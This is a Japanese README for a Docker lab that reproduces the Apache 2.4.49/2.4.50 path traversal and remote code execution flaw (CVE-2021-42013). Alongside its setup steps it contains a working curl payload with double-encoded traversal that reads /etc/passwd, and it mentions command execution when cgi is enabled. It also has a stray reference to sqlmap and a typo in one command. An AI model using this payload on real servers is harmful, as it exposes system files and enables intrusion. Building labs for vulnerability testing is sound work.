
CVE: 2021-42013 Tested on: 2.4.49 and 2.4.50 Description: Apache 2.4.49および2.4.50におけるパストラバーサルまたはリモートコード実行の脆弱性
このプロジェクトは、Dockerを使用して特定の脆弱性をDocker化することを目的としています。目的は、脆弱性が安全に悪用・テストできる隔離環境を作成することです。
Apache HTTP Server 2.4.50 - リモートコード実行 && パストラバーサル
このプロジェクトを実行するには、以下のソフトウェアがマシンにインストールされている必要があります:
前提条件がインストールされたら、以下のようにこのGitリポジトリをクローンできます:
git clone https://github.com/cybfar/cve-2021-42013-httpd.git
cd Ccve-2021-42013-httpd
リポジトリのディレクトリに移動したら、以下のコマンドを実行して脆弱な環境をセットアップします:
docker build -t apache-httpd-vuln .
docker run -p 8000:80 apache-httpd-vuln
その後、http://localhost:8000 にアクセスしてください。 正常に動作していれば、「It works」と表示されるはずです。
以下のcurlを使用したペイロードの実行により、ターゲットが脆弱であることがわかります。このスクリプトは、脆弱性を悪用するための適切なsqlmapコマンドを生成します。
curl -v --path-as-is localhost:8000/icons/.%%32e/.%%32e/.%%32e/.%%32e/etc/passwd
このペイロードは、ユーザーの同意なしにシステム内のユーザー情報に直接アクセスできます。
サーバー上でcgiまたはcgidモジュールを有効にすると、この脆弱性により攻撃者が任意のコマンドを実行できるようになります。